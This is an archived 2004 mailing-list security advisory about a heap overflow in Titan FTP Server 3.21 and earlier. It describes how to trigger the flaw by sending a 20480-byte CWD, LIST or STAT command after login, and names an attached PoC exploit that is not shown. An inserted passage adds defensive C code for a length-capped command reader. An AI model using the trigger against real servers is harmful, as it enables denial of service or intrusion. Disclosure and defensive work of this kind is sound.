[vulnwatch] Titan FTP Server Long Command Heap Overflow Vulnerability
daemon@ATHENA.MIT.EDU (lion)
Tue Aug 31 13:07:33 2004
Message-ID: <20040829182944.11540.qmail@mail.securityfocus.com>
Date: Mon, 30 Aug 2004 02:38:00 +0800
From: "lion" <lion@cnhonker.net>
To: "bugtraq" <bugtraq@securityfocus.com>
www.cnhonker.com
Security Advisory
Advisory Name: Titan FTP Server Long Command Heap Overflow Vulnerability
Release Date: 08/30/2004
Affected version: Titan FTP Server <= 3.21
Author: lion <lion@cnhonker.net>
Overview:
A vulnerability has been found in Titan FTP Server. Once a user has logged in, sending a single command of 20480 bytes to the server causes a heap overflow.
For example:
"CWD xxxxxxxxxxx..."
"LIST xxxxxxxxxxx..."
"STAT xxxxxxxxxxx..."
...
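As an added example (not the advisory's attached PoC and not Titan FTP Server's code), here is the kind of bounded command-line reader a server needs to resist this class of bug: the line length is checked against a fixed cap before a single byte is copied, so an over-long CWD, LIST or STAT is rejected instead of overrunning the destination buffer. FTP_MAX_CMD, ftp_read_command and check_command_length are assumed names chosen for this example.

```c
#include <stdlib.h>
#include <string.h>

/* Constructed cap: RFC 959 sets no hard limit on command length, so the
 * server must choose one; 512 bytes is ample for any legitimate path. */
#define FTP_MAX_CMD 512

enum ftp_cmd_status { FTP_CMD_OK = 0, FTP_CMD_TOO_LONG = -1, FTP_CMD_NO_EOL = -2 };

/* Copy one CRLF-terminated command from the receive buffer `in` (in_len bytes)
 * into `out` (out_size bytes), never writing past out_size. The length is
 * checked before any byte is copied, so an over-long line such as the
 * 20480-byte command in the advisory is rejected rather than overrunning the
 * destination. On success *consumed counts input bytes used, terminator included. */
int ftp_read_command(const char *in, size_t in_len,
                     char *out, size_t out_size, size_t *consumed)
{
    const char *eol = memchr(in, '\n', in_len);
    if (eol == NULL)   /* no terminator yet: reject if already over the cap */
        return in_len >= out_size ? FTP_CMD_TOO_LONG : FTP_CMD_NO_EOL;
    size_t line_len = (size_t)(eol - in);
    if (line_len > 0 && in[line_len - 1] == '\r')
        line_len--;
    if (line_len >= out_size)   /* keep room for the terminating NUL */
        return FTP_CMD_TOO_LONG;
    memcpy(out, in, line_len);
    out[line_len] = '\0';
    *consumed = (size_t)(eol - in) + 1;
    return FTP_CMD_OK;
}

/* Build a constructed request "<verb> xxx...\r\n" with arg_len filler bytes
 * and return the reader's verdict on it (used to exercise the cap). */
int check_command_length(const char *verb, size_t arg_len)
{
    size_t n = strlen(verb), total = n + 1 + arg_len + 2;
    char *req = malloc(total);
    if (req == NULL)
        return FTP_CMD_NO_EOL;
    memcpy(req, verb, n);
    req[n] = ' ';
    memset(req + n + 1, 'x', arg_len);
    memcpy(req + n + 1 + arg_len, "\r\n", 2);
    char out[FTP_MAX_CMD];
    size_t consumed = 0;
    int rc = ftp_read_command(req, total, out, sizeof out, &consumed);
    free(req);
    return rc;
}
```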
Exploit:
PoC exploit attached (titanftp.c).
About HUC:
HUC is still alive.